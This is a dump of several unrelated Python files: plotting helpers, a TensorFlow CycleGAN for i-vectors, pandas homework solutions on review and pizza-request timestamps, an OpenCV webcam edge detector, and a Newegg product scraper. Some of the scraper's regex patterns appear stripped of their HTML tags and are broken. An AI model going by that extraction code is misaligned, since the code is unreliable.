plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n plt.show()\n \ndef plot_subspace_errors(sub_br,out_label=None):\n \n plot_setup()\n kk = sub_br.shape[0]\n if out_label is None:\n out_label = 'Output'\n \n plt.figure()\n plt.semilogy(range(1,kk+1),sub_br[:,1],'ko-',markersize=12)\n plt.fill_between(range(1,kk+1),sub_br[:,0],sub_br[:,2],\n facecolor='0.7', interpolate=True)\n plt.xlabel('Subspace dimension')\n plt.ylabel('Subspace distance')\n plt.grid(True)\n plt.xticks(range(1,kk+1))\n plt.axis([1,kk,np.amin(sub_br[:,0]),1])\n figname = 'figs/subspace_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n plt.show()\n \ndef plot_eigenvectors(W,W_boot=None,in_labels=None,out_label=None):\n \n plot_setup()\n n = len(W.shape)\n m = W.shape[0]\n # set labels for plots\n if in_labels is None:\n in_labels = [str(i) for i in range(1,m+1)]\n if out_label is None:\n out_label = 'Output'\n \n if n==1:\n plt.figure()\n if W_boot is not None:\n plt.plot(range(1,m+1),W_boot,color='0.7')\n plt.plot(range(1,m+1),W,'ko-',markersize=12)\n plt.xlabel('Variable')\n plt.ylabel('Weights')\n plt.grid(True)\n if m<=10:\n plt.xticks(range(1,m+1),in_labels,rotation='vertical')\n plt.margins(0.2)\n plt.subplots_adjust(bottom=0.15)\n plt.axis([1,m,-1,1])\n figname = 'figs/evecs_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n else:\n plt.figure()\n for k in range(np.minimum(3,W.shape[1])):\n plt.plot(range(1,m+1),W[:,k],'bo-',markersize=12,label='%d' % k)\n plt.xlabel('Variable')\n plt.ylabel('Eigenvectors')\n plt.grid(True)\n if m<=10:\n plt.xticks(range(1,m+1),in_labels,rotation='vertical')\n plt.margins(0.2)\n plt.subplots_adjust(bottom=0.15)\n plt.axis([1,m,-1,1])\n plt.legend(loc='best')\n figname = 'figs/evecs_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n \n plt.show()\n\ndef sufficient_summary_plot(y,f,out_label=None):\n \n plot_setup()\n \n # check sizes of y\n n = len(y.shape) \n if n == 1:\n y1 = y\n else:\n y1 = y[:,0]\n y2 = y[:,1]\n \n # set labels for plots\n if out_label is None:\n out_label = 'Output'\n \n plt.figure()\n plt.plot(y1,f,'bo',markersize=12)\n plt.xlabel('Active variable')\n plt.ylabel(out_label)\n plt.grid(True)\n figname = 'figs/ssp1_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n \n if n==2:\n \n plt.figure()\n plt.scatter(y1,y2,c=f,s=150.0,vmin=np.min(f),vmax=np.max(f))\n plt.xlabel('Active variable 1')\n plt.ylabel('Active variable 2')\n plt.title(out_label)\n figname = 'figs/ssp2_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n \n plt.show()\n ","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"404515059","text":"import tensorflow as tf\nimport tflearn\n\nfrom tflearn.layers.core import input_data, dropout, fully_connected \nfrom tflearn.layers.conv import conv_2d,conv_2d_transpose, max_pool_2d\nfrom tflearn.layers.normalization import batch_normalization \nfrom tflearn.layers.estimator import regression\n\nimport ResBlock_LRelu\n\n# The number of samples per batch.\nBATCH_SIZE = 1\n\n# The height of each i-vector.\nIVEC_HEIGHT = 1\n\n# The length of each i-vector.\nIVEC_DIM = 600\n\n# The number of color channels per image.\nIVEC_CHANNELS = 1\n\nPOOL_SIZE = 50\n\ndef get_outputs(inputs, network=\"tensorflow\"):\n ivec_a = inputs['ivec_a']\n ivec_b = inputs['ivec_b']\n\n fake_pool_a = inputs['fake_a']\n fake_pool_b = inputs['fake_b']\n\n with tf.variable_scope(\"Model\") as scope:\n\n if network == \"tensorflow\":\n current_discriminator = build_discriminator_tfl\n current_generator = build_generator_tfl\n else:\n raise ValueError(\n 'network must be tensorflow'\n )\n\n prob_real_a_is_real = current_discriminator(ivec_a, \"d_A\")\n prob_real_b_is_real = current_discriminator(ivec_b, \"d_B\")\n\n fake_ivec_b = current_generator(ivec_a, name=\"g_A\")\n fake_ivec_a = current_generator(ivec_b, name=\"g_B\")\n #print ('ivec_b: ', ivec_b)\n #print ('fake_ivec_a: ', fake_ivec_a)\n\n scope.reuse_variables()\n\n prob_fake_a_is_real = current_discriminator(fake_ivec_a, \"d_A\")\n prob_fake_b_is_real = current_discriminator(fake_ivec_b, \"d_B\")\n\n # \"cycle_ivec_a\" means: A -> Fake_B -> \"Fake_A\"\n cycle_ivec_a = current_generator(fake_ivec_b, name=\"g_B\")\n cycle_ivec_b = current_generator(fake_ivec_a, name=\"g_A\")\n\n scope.reuse_variables()\n\n prob_fake_pool_a_is_real = current_discriminator(fake_pool_a, \"d_A\")\n prob_fake_pool_b_is_real = current_discriminator(fake_pool_b, \"d_B\")\n\n return {\n 'prob_real_a_is_real': prob_real_a_is_real,\n 'prob_real_b_is_real': prob_real_b_is_real,\n 'prob_fake_a_is_real': prob_fake_a_is_real,\n 'prob_fake_b_is_real': prob_fake_b_is_real,\n 'prob_fake_pool_a_is_real': prob_fake_pool_a_is_real,\n 'prob_fake_pool_b_is_real': prob_fake_pool_b_is_real,\n 'cycle_ivec_a': cycle_ivec_a,\n 'cycle_ivec_b': cycle_ivec_b,\n 'fake_ivec_a': fake_ivec_a,\n 'fake_ivec_b': fake_ivec_b,\n }\n\n\ndef build_generator_tfl(inputgen, name=\"generator\"):\n with tf.variable_scope(name):\n # downsampling\n inputgen = tf.reshape(inputgen, [1, 1, IVEC_DIM, 1])\n # conv layer 1\n g_cnn = conv_2d(inputgen, 32, [1, 3], strides=1)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n # conv layer 2\n g_cnn = conv_2d(g_cnn, 64, [1, 3], strides=[1, 2])\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n # conv layer 3\n g_cnn = conv_2d(g_cnn, 128, [1, 3], strides=[1, 2])\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n # res_net with 6 blocks\n # modified to use Leaky Relu activation, alpha=0.2\n g_cnn = ResBlock_LRelu.residual_block_LRelu(g_cnn, 6, 128)\n\n # upsampling\n # deconv layer 1\n g_cnn = conv_2d_transpose(g_cnn, 64, [1, 3], output_shape=[1, 300, 64], strides=[1, 2])\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n # deconv layer 2\n g_cnn = conv_2d_transpose(g_cnn, 32, [1, 3], output_shape=[1, 600, 32], strides=[1, 2])\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n #output layer\n g_cnn = conv_2d(g_cnn, 1, [1, 3], strides=1)\n g_cnn = tf.reshape(g_cnn, [1, IVEC_DIM])\n \n return g_cnn\n\n\ndef build_discriminator_tfl(inputdisc, name=\"discriminator\"):\n with tf.variable_scope(name):\n inputdisc = tf.reshape(inputdisc, [1, 1, IVEC_DIM, 1])\n # conv layer 1\n d_cnn = conv_2d(inputdisc, 64, [1, 3], strides=1)\n #d_cnn = batch_normalization(d_cnn)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n # conv layer 2\n d_cnn = conv_2d(d_cnn, 128, [1, 3], strides=[1, 2])\n #d_cnn = batch_normalization(d_cnn)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n # fully connected layer 1\n d_cnn = fully_connected(d_cnn, 512)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n # fully connected layer 1\n d_cnn = fully_connected(d_cnn, 512)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n #output layer\n #d_cnn = fully_connected(d_cnn, 1, activation='sigmoid')\n d_cnn = fully_connected(d_cnn, 1)\n \n return d_cnn\n\ninput_a = tf.placeholder(tf.float32, [BATCH_SIZE, IVEC_DIM], name=\"input_A\")\ninput_b = tf.placeholder(tf.float32, [BATCH_SIZE, IVEC_DIM], name=\"input_B\")\nfake_A = tf.placeholder(tf.float32, [BATCH_SIZE, IVEC_DIM], name=\"fake_A\")\nfake_B = tf.placeholder(tf.float32, [BATCH_SIZE, IVEC_DIM], name=\"fake_B\")\n\ninputs = {\n 'ivec_a': input_a,\n 'ivec_b': input_b,\n 'fake_a': fake_A,\n 'fake_b': fake_B,\n}\n\noutputs = get_outputs(inputs)\n\nfake_ivec_a = outputs['fake_ivec_a']\n\nprint (fake_ivec_a)\n\n'''\ntf_x = tf.placeholder(tf.float32, [1, 1, IVEC_DIM, 1]) # (batch, height, width, channel)\noutput = tf.placeholder(tf.float32, [1, 1, IVEC_DIM, 1])\n\n# downsampling\n#inputgen = tf.reshape(tf_x, [1, 1, IVEC_DIM, 1])\n# conv layer 1\ng_cnn = conv_2d(tf_x, 32, [1, 7], strides=1)\nprint (g_cnn)\ng_cnn = batch_normalization(g_cnn)\ng_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n# conv layer 2\ng_cnn = conv_2d(g_cnn, 64, [1, 5], strides=1)\nprint (g_cnn)\ng_cnn = batch_normalization(g_cnn)\ng_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\nconv1 = tf.layers.conv2d( # shape (1, 1, 600, 1)\n inputs=tf_x,\n filters=64,\n kernel_size=[1, 7],\n strides=1,\n padding='same',\n activation=tf.nn.leaky_relu\n) # -> (1, 600, 64)\npool1 = tf.layers.max_pooling2d(\n conv1,\n pool_size=[1, 2],\n strides=2,\n) # -> (14, 14, 16)\n\nconv2 = tf.layers.conv2d(pool1, 64, [1, 5], 1, 'same', activation=tf.nn.leaky_relu) # -> (14, 14, 32)\npool2 = tf.layers.max_pooling2d(conv2, [1, 2], 2) # -> (7, 7, 32)\n\nconv3 = tf.layers.conv2d(pool2, 64, [1, 3], 1, 'same', activation=tf.nn.leaky_relu) # -> (14, 14, 32)\npool3 = tf.layers.max_pooling2d(conv3, [1, 2], 2) # -> (7, 7, 32)\nprint (pool3)\n\nflat = tf.reshape(pool3, [1, 1*75*64]) # -> (1*75*384, )\nprint (flat)\nOut_disc = tf.layers.dense(flat, 600, activation=tf.nn.sigmoid) # output layer\nprint (Out_disc)\n'''","sub_path":"tftest2.py","file_name":"tftest2.py","file_ext":"py","file_size_in_byte":6784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"371224882","text":"## File: ds4ua-assignment-8-solns.py\n## Topic: Assignment 8 Solutions\n## Name: David Smith\n## Section Time: 5:00-6:15\n## Grading Group: 5\n\n\nimport pandas as pd # Load pandas as pd\nreviews = pd.read_csv('reviews.txt', \n sep='\\t',\n header=None,\n names=['Reviewer','Movie','Rating','Date'])\n# Read in the DataFrame\n\n## 1a.\n\noldest_date = reviews['Date'].min() # Get the UTC for the oldest date\nnewest_date = reviews['Date'].max() # Get the UTC for the newest date\nod = pd.to_datetime(oldest_date, unit='s') # Convert the UTC for the oldest date\n# to a datetime object\nnd = pd.to_datetime(newest_date, unit='s') # Convert the UTC for the newest date\n# to a datetime object\nprint('The date and time of the oldest review is', od)\nprint('The date and time of the most recent review is', nd)\n\n\"\"\"\n# 1a\nThe date and time of the oldest review is 1997-09-20 03:05:10\nThe date and time of the most recent review is 1998-04-22 23:10:38\n\"\"\"\n\n## 1b.\n\nformat = \"%A %B %d %Y %H:%M:%S\" # Create a format string for the output\nmedian_date = reviews['Date'].median() # Get the median UTC\nmd = pd.to_datetime(median_date, unit='s') # Convert the median UTC to a datetime object\nprint('The median date and time for the reviews is', md.strftime(format))\n# Print the median datetime as a formatted string\n\n\"\"\"\n# 1b\nThe median date and time for the reviews is Monday December 22 1997 21:42:24\n\"\"\"\n\n## 1c.\n\ndates = pd.to_datetime(reviews['Date'], unit='s') # Get a Series of datetime objects\n# for all of the UTC codes\nreviews['Month'] = dates.dt.month # Add a column called 'Dates' to the DataFrame\n# consisiting of the months for each review\nmonth_gp = reviews['Rating'].groupby(reviews['Month']) # Group the ratings by the\n# months that they occurred in\nmonth_gp.mean() # Calculate and print the average rating for each month\n\n\"\"\"\n# 1c\nMonth\n1 3.397730\n2 3.455009\n3 3.548831\n4 3.574848\n9 3.540125\n10 3.591421\n11 3.559842\n12 3.580388\nName: Rating, dtype: float64\n\"\"\"\n\n## 1d.\n\nreviews['DayOfWeek'] = dates.dt.strftime('%A') # Add a column called 'DayOfWeek' to\n# the DataFrame consisting of the day of the week for each review\nweek_gp = reviews['Rating'].groupby(reviews['DayOfWeek']) # Group the ratings by\n# the day of the week each occurred\nweek_gp.count().sort_values(ascending=False).index[0] # Count the number of ratings\n# for each day of the week, and report the day of the week that had the highest number\n# of ratings\n\n\"\"\"\n# 1d\n'Wednesday'\n\"\"\"\n\n## 1e.\n\nreviewer_gp = reviews['Date'].groupby(reviews['Reviewer']) # Group the dates by\n# each reviewer\nfive_reviewers = reviewer_gp.count().sort_values(ascending=False).index[0:5]\n# Get the five reviewers who had the most reviews\nfor rev in five_reviewers:# For each of the top 5 reviewers, do the following:\n rev_dates = reviews[reviews['Reviewer'] == rev] # Get the dates for the reviewer\n rev_first = rev_dates['Date'].min() # get the date of the first review for the reviewer\n rf = pd.to_datetime(rev_first, unit='s') # Convert the UTC to a datetime object\n print('The first review of reviewer', rev, 'was on', rf)\n\n\"\"\"\n# 1e\nThe first review of reviewer 405 was on 1998-01-23 08:37:15\nThe first review of reviewer 655 was on 1998-02-14 02:52:00\nThe first review of reviewer 13 was on 1997-12-07 17:11:23\nThe first review of reviewer 450 was on 1997-12-15 19:53:37\nThe first review of reviewer 276 was on 1997-09-20 20:12:17\n\"\"\"\n\nlines = pd.Series(open('pizza_requests.txt').read().splitlines())\n\n## 2a.\n\nutc = pd.DataFrame(lines[lines.str.contains('unix_timestamp_of_request_utc')].str.split().str[1],\n columns = ['Date']) # Create a DataFrame with a 'Date' column\n # consisting of the UTC codes\noldest_date = utc['Date'].min() # Get the UTC for the oldest date\nnewest_date = utc['Date'].max() # Get the UTC for the newest date\nod = pd.to_datetime(oldest_date, unit='s') # Convert the UTC for the oldest date\n# to a datetime object\nnd = pd.to_datetime(newest_date, unit='s') # Convert the UTC for the newest date\n# to a datetime object\nprint('The date and time of the oldest request is', od)\nprint('The date and time of the most recent request is', nd)\n\n\"\"\"\n# 2a\nThe date and time of the oldest request is 2011-02-14 22:28:57\nThe date and time of the most recent request is 2013-10-12 01:30:36\n\"\"\"\n\n## 2b.\n\nmedian_date = utc['Date'].median() # Get the median UTC\nmd = pd.to_datetime(median_date, unit='s') # Convert the median UTC to a datetime object\nprint('The median date and time for the reviews is', md.strftime(format))\n# Print the median datetime as a formatted string\n\n\"\"\"\n# 2b\nThe median date and time for the reviews is Friday July 20 2012 17:54:08\n\"\"\"\n\n## 2c.\n\ndates = pd.to_datetime(utc['Date'], unit='s') # Convert the column of UTC codes to a\n# Series of datetime objects\nutc['Hour'] = dates.dt.hour # Add a column called 'Hour' to the DataFrame consisting\n# of the hour each request occurred\nhour_gp = utc['Date'].groupby(utc['Hour']) # Group the dates by the hour each occurred\nhour_gp.count().sort_values(ascending=False).iloc[0:5] # Report the five one-hour periods\n# with the most requests\n\n\"\"\"\n# 2c\nHour\n0 508\n22 497\n23 491\n21 464\n1 441\nName: Date, dtype: int64\n\"\"\"\n\n## 2d.\n\npizza = lines[lines.str.contains('requester_received_pizza')].str.split().str[1]\n# Get the 'true' or 'false' indicators of whether a user received pizza\nutc['Pizza'] = pizza.values # Add those indicators in a new column of the DateFrame\n# called \"Pizza'\n\ndef prop(x): # A function that returns the proportion of successful pizza requests in\n# a DataFrame\n pro = x['Pizza'].loc[x['Pizza'].values == 'true'].count() / x['Pizza'].count()\n # Calculate the proportion of successful pizza requests in DataFrame x\n return pro # Return the proportion\n\nprop_gp = utc.groupby(utc['Hour']) # Group the DataFrame by hour\nprops = prop_gp.apply(prop) # Apply the function prop to each hour to get the proportion\n# of successful pizza requests for each hour\nhigh_prop = props.sort_values(ascending=False).index[0] # Get the hour that has the\n# highest proportion of successful pizza requests\nprint('Hour %d had the highest proportion of successful pizza requests.' % high_prop)\n\n\"\"\"\n# 2d\nHour 13 had the highest proportion of successful pizza requests.\n\"\"\"\n\n## 2e.\n\nlow_prop = props.sort_values().index[0] # Get the hour that has the lowest proportion\n# of successful pizza requests\nprint('Hour %d had the lowest proportion of successful pizza requests.' % low_prop)\n\n\"\"\"\n# 2e\nHour 8 had the lowest proportion of successful pizza requests.\n\"\"\"","sub_path":"ds4ua-assignment-8-solns.py","file_name":"ds4ua-assignment-8-solns.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"84734717","text":"# import the necessary packages\nfrom pyimagesearch.transform import four_point_transform\nfrom skimage.filters import threshold_local\nimport numpy as np\nimport argparse\nimport cv2\nimport imutils\n\n\ndef add_second_image(origin, sec_image):\n x_offset = origin.shape[1] - 20\n y_offset = origin.shape[0] - 20\n # x_offset = y_offset = 20\n # origin[y_offset:y_offset + sec_image.shape[0], x_offset:x_offset + sec_image.shape[1]] = sec_image\n origin[y_offset - sec_image.shape[0]:y_offset, x_offset - sec_image.shape[1]:x_offset] = sec_image\n\n\ndef put4ChannelImageOn4ChannelImage(back, fore, x, y):\n rows, cols, channels = fore.shape\n trans_indices = fore[..., 3] != 0 # Where not transparent\n overlay_copy = back[y:y + rows, x:x + cols]\n print(trans_indices.shape)\n overlay_copy[trans_indices] = fore[trans_indices]\n back[y:y + rows, x:x + cols] = overlay_copy\n\n\ndef overlay_image_alpha(img, img_overlay, pos, alpha_mask):\n \"\"\"Overlay img_overlay on top of img at the position specified by\n pos and blend using alpha_mask.\n\n Alpha mask must contain values within the range [0, 1] and be the\n same size as img_overlay.\n \"\"\"\n\n x, y = pos\n\n # Image ranges\n y1, y2 = max(0, y), min(img.shape[0], y + img_overlay.shape[0])\n x1, x2 = max(0, x), min(img.shape[1], x + img_overlay.shape[1])\n\n # Overlay ranges\n y1o, y2o = max(0, -y), min(img_overlay.shape[0], img.shape[0] - y)\n x1o, x2o = max(0, -x), min(img_overlay.shape[1], img.shape[1] - x)\n\n # Exit if nothing to do\n if y1 >= y2 or x1 >= x2 or y1o >= y2o or x1o >= x2o:\n return\n\n channels = img.shape[2]\n\n alpha = alpha_mask[y1o:y2o, x1o:x2o]\n alpha_inv = 1.0 - alpha\n\n for c in range(channels):\n img[y1:y2, x1:x2, c] = (alpha * img_overlay[y1o:y2o, x1o:x2o, c] +\n alpha_inv * img[y1:y2, x1:x2, c])\n\n\ndef contour_detect2(imgray):\n ret, thresh = cv2.threshold(imgray, 127, 255, 0)\n contours = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n return contours\n\n\ndef contour_detect(edge):\n # find the contours in the edged image, keeping only the\n # largest ones, and initialize the screen contour\n cnts = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:5]\n screenCnt = None\n\n # loop over the contours\n for c in cnts:\n # approximate the contour\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n\n # if our approximated contour has four points, then we\n # can assume that we have found our screen\n if len(approx) == 4:\n screenCnt = approx\n break\n\n return screenCnt\n\n\ndef edge_detect(image):\n # ratio = image.shape[0] / 500.0\n # orig = image.copy()\n # image = imutils.resize(image, height=100)\n\n # convert the image to grayscale, blur it, and find edges\n # in the image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(gray, 75, 200)\n\n return edged\n\n\n# # find the contours in the edged image, keeping only the\n# # largest ones, and initialize the screen contour\n# cnts = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n# cnts = imutils.grab_contours(cnts)\n# cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:5]\n#\n# # loop over the contours\n# for c in cnts:\n# # approximate the contour\n# peri = cv2.arcLength(c, True)\n# approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n#\n# # if our approximated contour has four points, then we\n# # can assume that we have found our screen\n# if len(approx) == 4:\n# screenCnt = approx\n# break\n#\n# # show the contour (outline) of the piece of paper\n# print(\"STEP 2: Find contours of paper\")\n# cv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 2)\n# cv2.imshow(\"Outline\", image)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n#\n# # apply the four point transform to obtain a top-down\n# # view of the original image\n# warped = four_point_transform(orig, screenCnt.reshape(4, 2) * ratio)\n#\n# # convert the warped image to grayscale, then threshold it\n# # to give it that 'black and white' paper effect\n# warped = cv2.cvtColor(warped, cv2.COLOR_BGR2GRAY)\n# T = threshold_local(warped, 11, offset=10, method=\"gaussian\")\n# warped = (warped > T).astype(\"uint8\") * 255\n#\n# # show the original and scanned images\n# print(\"STEP 3: Apply perspective transform\")\n# cv2.imshow(\"Original\", imutils.resize(orig, height=650))\n# cv2.imshow(\"Scanned\", imutils.resize(warped, height=650))\n# cv2.waitKey(0)\n\n\ncap = cv2.VideoCapture(0)\n\nwhile (True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n frame = imutils.resize(frame, height=500)\n\n # Our operations on the frame come here\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # gray = cv2.bilateralFilter(gray, 11, 17, 17)\n\n edged = edge_detect(frame)\n\n # find contours\n screenCnt = contour_detect(edged)\n\n edged = cv2.cvtColor(edged, cv2.COLOR_GRAY2RGB)\n edged = imutils.resize(edged, height=250)\n\n if (screenCnt is not None):\n cv2.drawContours(frame, [screenCnt], -1, (0, 255, 0), 2)\n\n add_second_image(frame, edged)\n # put4ChannelImageOn4ChannelImage(frame, edged, 20, 20)\n # overlay_image_alpha(frame, edged, (10, 10), edged[:, :, 3] / 255.0)\n\n # Display the resulting frame\n cv2.imshow('origin', frame)\n # cv2.imshow('edged', edged)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"cam_to_credit/liveCamEdgeDetect.py","file_name":"liveCamEdgeDetect.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"129259812","text":"import codecs\nimport json\nfrom multiprocessing import Pool, Lock\nimport re\nfrom Tools import get_html,ALL_CONFIG\n\n#把list洗乱\ndef shuffle_list(list_name):\n\n from random import shuffle\n shuffle(list_name)\n # 返回随机排序后的序列\n return list_name\n\n#传入商品页面的html和商品的id\ndef get_info(html, itemsId):\n\n items_json = {'registered_land': '', 'isbn': '', 'description': '', 'weight': '0.0000', 'ean': '', 'mpn': '',\n 'key_name': ' ', 'price': '', 'height': '0.0000', 'currency': 'USD', 'brand': '',\n 'length_class': '', 'product_id': '', 'category': '', 'jan': '', 'seller_id': '', 'name': '',\n 'keyword': '', 'weight_class': 'kg', 'url': '', 'key_attribute': '', 'detail': {}, 'shipping': '',\n 'orders': 0, 'reviews': '0', 'width': '0.0000', 'length': '0.0000', 'location': '',\n 'attributes': [{'price': '', 'variation_id': '', 'dictory': 'Ships From',\n 'attributes': {'Ships From': ''}, 'image': [], 'quantity': 99}],\n 'category_id_path': '', 'category_id': '', 'upc': '', 'image': []}\n\n #读取价格字段存入\n # price = re.findall(\"(.*?)', html_price)\n if price:\n price = price[0]\n else:\n price = 'None'\n items_json['price'] = price\n\n # print '----------------url--------------'\n items_json['url'] = url\n\n # print '----------------shipping--------------'\n ship = '0'\n ship = re.search(r'product_default_shipping_cost:\\[(.*?)\\]', html)\n if ship:\n ship = ship.group(1).replace(\"'\", \"\")\n items_json['shipping'] = ship\n\n # print '----------------brand--------------'\n brand = ''\n brand = re.search(r'product_manufacture:\\[(.*?)\\]', html)\n if brand:\n brand = brand.group(1).replace(\"'\", \"\")\n items_json['brand'] = brand\n\n # print '----------------name--------------'\n name = ''\n name_info = re.search(r'product_title:\\[(.*?)\\]', html)\n if name_info:\n name = name_info.group(1).replace(\"'\", \"\").replace('&', '').replace(\"#34;\", \"''\").replace(\"#40;\",\n \"(\").replace(\n '#41;', ')').replace(\"#47;\", \"\\\\\")\n name = name.decode(\"ascii\").encode(\"utf-8\")\n items_json['name'] = name\n\n # print '----------------weight--------------'\n weight_number = 0.0000\n items_json['weight'] = weight_number\n\n # print '----------------weight_class--------------'\n weight_class = 'kg'\n items_json['weight_class'] = weight_class\n\n # print '----------------height--------------'\n height_number = 0.0000\n items_json['height'] = height_number\n\n # print '----------------width--------------'\n width = 0.0000\n items_json['width'] = width\n\n # print '----------------length_class--------------'\n length_class = 'cm'\n items_json['length_class'] = length_class\n\n # print '----------------product_id--------------'\n items_json['product_id'] = itemsId\n\n # print '----------------reviews--------------\n reviews = '0'\n items_json['reviews'] = reviews\n\n # print '----------------upc--------------'\n upc = ''\n items_json['upc'] = upc\n\n\n # print '----------------seller_id--------------'\n sellerId = ''\n items_json['seller_id'] = sellerId\n\n # print '----------------detail----------详描----'\n Specification = {}\n spct_info = re.search(r'
    (.*?)
    ', html, re.S)\n if spct_info is not None:\n spct_info = spct_info.group(1)\n spct_list = re.findall(r'
    (.*?)
    (.*?)
    ', spct_info, re.S)\n if spct_list:\n for spct in spct_list:\n temp1 = re.sub(r'<[^>]+>', '', spct[0], re.S)\n temp2 = re.sub(r'<[^>]+>', '', spct[1], re.S)\n Specification[temp1] = temp2\n items_json['detail'] = Specification\n\n # Specification = str(Specification).replace('{', '').replace('}', '').replace(\"'\", '').replace(',','').replace('
    ','')\n # if len(items_info['Specification']) >= 2000:\n # items_info['Specification'] = items_info['Specification'][0:1999]\n\n image = []\n image_info = re.search(r'\"imageSetImageList\":\"(.*?)\"', html, re.S)\n image_list = ''\n if image_info is not None:\n image_list = image_info.group(1)\n image_all = image_list.split(',')\n for images in image_all:\n images = 'http://images17.newegg.com/is/image/newegg/' + images\n image.append(images)\n if image_info is None:\n image_info = re.search(r'\"imageNameList\":\"(.*?)\"\\}', html, re.S)\n if image_info is not None:\n image_list = image_info.group(1)\n image_all = image_list.split(',')\n for images in image_all:\n if images != '\"dfis360ImgFlag\":\"':\n images = images.split('\"')[0]\n images = 'http://images10.newegg.com/ProductImage/' + images\n image.append(images)\n items_json['image'] = image\n\n category_dict = {'Computer Systems':'ID-CS-503','Components':'ID-C-504','Electronics':'ID-E-505','Gaming':'ID-G-506','Networking':'ID-N-507',\n 'Office Solutions':'ID-OS-508','Software Services':'ID-SS-509','Automotive Industrial':'ID-AI-510','Home Tools':'ID-HT-511',\n 'Health Sports':'ID-HS-512','Apparel Accessories':'ID-AA-513','Hobbies Toys':'ID-HT-514'}\n\n # print '----------------category--------------'\n category_string_html = re.findall(r'
    (.*?)
    ', html, re.S)\n category_html_list = re.findall(r'title=\"(.*?)\"', str(category_string_html), re.S)\n print (category_html_list)\n category_string = ''\n for category_s in category_html_list[2:]:\n category_string = category_string + category_s + '>'\n items_json['category'] = category_string[:-1]\n\n # print '----------------category_id_path--------------'\n category_url_list = re.findall(r'href=\"(.*?)\"',str(category_string_html),re.S)\n category_id_path= ''\n for url_path in category_url_list:\n url_path = url_path.split('?')[0]\n category_id_path = category_id_path + url_path.split('/')[-1] + '>'\n items_json['category_id_path'] = str(category_dict[category_html_list[2]])+category_id_path[5:-1]\n\n # print '----------------category_id----------------'\n items_json['category_id'] = category_id_path.split('>')[-2]\n\n # print '----------------attributes----------------'\n items_json['attributes'][0]['price'] = str(price)\n items_json['attributes'][0]['variation_id'] = itemsId + '_' + itemsId\n items_json['attributes'][0]['image'] = image[0]\n\n # print '----------------description-------短描-------'\n details = []\n description_str = ''\n detail_info = re.search(r'
      (.*?)
    ', html, re.S)\n if detail_info is not None:\n detail_info = detail_info.group(1)\n detail_info = detail_info.replace('\\r\\n', '').replace('\\t', '')\n detail = re.findall(r'(.*?)', detail_info, re.S)\n for i in detail:\n i = i.strip()\n i = i.decode(\"ascii\").encode(\"utf-8\")\n details.append(i)\n #函数get_feature_dict\n for description in details:\n description_str = description_str + description + ';'\n items_json['description'] = description_str\n\n # print '----------------写入文件----------------'\n json_file = json.dumps(items_json)\n result_file.write(json_file + '\\n')\n print ('=============')\n print (items_json)\n result_file.flush()\n\n # for k in titles:\n # if items_dict.has_key(k):\n # value = items_dict.get(k)\n # else:\n # value = 'None'\n # lock.acquire()\n # result_file.write(str(value) + \"\\t\")\n # result_file.flush()\n # lock.release()\n #\n # lock.acquire()\n # result_file.write('\\n')\n # result_file.flush()\n # lock.release()\n\n#把itemsId页面的html传入get_info函数中,把失败的id重新存一个文件\ndef handle(itemsId):\n try:\n #删除itemsId开头结尾处的空格\n itemsId = itemsId.strip()\n #商品详情页\n url = 'http://www.newegg.com/Product/Product.aspx?Item=' + itemsId\n #获取每一个商品页面的html\n html = get_html.get_html(url)\n\n if html:\n #调用get_info函数,传入html和每个商品的id\n get_info(html, itemsId)\n else:\n with open('./get_html_fail.txt', 'aw') as h:\n h.write(itemsId + '\\n')\n\n 